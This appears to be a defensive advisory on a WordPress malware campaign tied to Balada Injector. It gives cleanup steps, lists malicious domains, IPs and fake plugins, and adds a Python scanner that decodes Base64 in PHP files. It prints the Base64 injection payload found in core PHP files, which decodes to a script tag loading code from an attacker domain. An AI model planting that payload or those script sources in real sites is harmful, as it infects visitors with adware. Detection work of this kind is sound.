If your website contains content, such as scripts or images, loaded from either the line.beatylines.com or the fire.descriptionscripts.com domain, you can follow these steps:
- Temporarily disable public access to your website, to prevent data loss and to protect visitors from having their computers and phones infected with adware.
- Check the main entry points to the web files, such as FTP accounts, SSH access and cron jobs.
- Back up the web files and the site’s database.
- Proceed with a thorough cleanup, making sure there is no malware and there are no vulnerable site components left.
- Check the Google search results for SEO spam by typing “site:example.com”, where you can replace example.com with your own domain name.
- Perform a blacklist check using the Sucuri tool, VirusTotal, site24x7.com and MxToolbox.
- Restore the site, apply all the necessary updates and monitor it closely.
Malicious plugins: Wp sleaper, wp-sleaper, wp-sleaper.com
URLs:
Related URLs:
https://cdn.statisticline.com/scripts/swaynew.js
https://record.findtrustclicks.com/state.js
https://back.firstblackphase.com/mbRB96
Base64 injected in PHP files, including index.php and wp-blog-header.php.
PHNjcmlwdCBzcmM9J2h0dHBzOi8vYmxvY2suZGVzY3JpcHRpb25zY3JpcHRzLmNvbS9zY3JpcHRzL3NvdWNlLmpzP3Y9MS4wLjMnIHR5cGU9J3RleHQvamF2YXNjcmlwdCc+PC9zY3JpcHQ+
Malicious domains: desirebluestock.com, 0.desirepurplestock.com, buyadvupfor24.com, track.wbdpnz.com, noomigoomini.com, tratbc.com, datingspicyhere.life, line.beatylines.com, fire.descriptionscripts.com, descriptionscripts.com, shbzek.com, haxbyq.com, ulmoyc.com.
Malicious IPs: 116.202.2.30, 185.56.234.205, 45.9.148.27, 2.59.222.113 ASN AS209155, 54.162.51.18.
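One way to hunt for the Base64 injection described above during the cleanup step, as an added example that is not MageFix's own tooling: it decodes every long Base64-looking run in each `.php` file and reports runs that decode to a listed domain or to a `<script>` tag. The function names, the 40-character threshold, the domain subset and the constructed sample's PHP wrapper are assumptions.

```python
import base64
import binascii
import re
import sys
from pathlib import Path

# Subset of this page's "Malicious domains" list; extend with the rest as needed.
BAD_DOMAINS = ("descriptionscripts.com", "beatylines.com", "tratbc.com",
               "datingspicyhere.life")
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")  # long Base64-looking run (assumed threshold)

def decoded_runs(data: bytes):
    """Yield (offset, decoded bytes) for each Base64-looking run that decodes."""
    for m in B64_RUN.finditer(data):
        run = m.group(0).rstrip(b"=")
        run += b"=" * (-len(run) % 4)          # normalise padding
        try:
            yield m.start(), base64.b64decode(run, validate=True)
        except (binascii.Error, ValueError):
            continue                           # not valid Base64, ignore

def domain_hit(text: bytes):
    """Return the first listed domain found in text, or None."""
    low = text.lower()
    return next((d for d in BAD_DOMAINS if d.encode() in low), None)

def scan_bytes(name: str, data: bytes):
    """Check one file's bytes, both as written and after Base64 decoding."""
    hit = domain_hit(data)
    findings = [(name, "plaintext", "references " + hit)] if hit else []
    for offset, payload in decoded_runs(data):
        hit = domain_hit(payload)
        if hit:
            findings.append((name, f"base64@{offset}", "decodes to a reference to " + hit))
        elif b"<script" in payload.lower():
            findings.append((name, f"base64@{offset}", "decodes to a <script> tag"))
    return findings

def scan_tree(root):
    """Scan every .php file under root (a backup copy of the web files)."""
    return [f for p in sorted(Path(root).rglob("*.php")) for f in scan_bytes(str(p), p.read_bytes())]

def constructed_sample() -> bytes:
    """Constructed file content; the page does not show the surrounding PHP."""
    tag = b"<script src='https://line.beatylines.com/placeholder.js'></script>"
    return b"<?php echo base64_decode('" + base64.b64encode(tag) + b"'); ?>"

if __name__ == "__main__":  # scan argv[1] if given, else the constructed sample
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_bytes("index.php", constructed_sample())
    print(*hits, sep="\n")
```

Run it against the backup taken earlier rather than the live site, and treat a hit as a pointer to a file that needs manual review, not as proof that the rest of the tree is clean.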
Related Twitter posts
New line.beatylines[.]com wave of Balada Injector. https://t.co/21IDghU8i0 https://t.co/NltZnUxyHg
For example, injections via the fake wp_resortpack plugin (it also has NDSW / SocGholish part). Thanks @riper81
Re: https://t.co/YDzv8ntLhu pic.twitter.com/wh4gECzQPj
— Denis (@unmaskparasites) April 25, 2023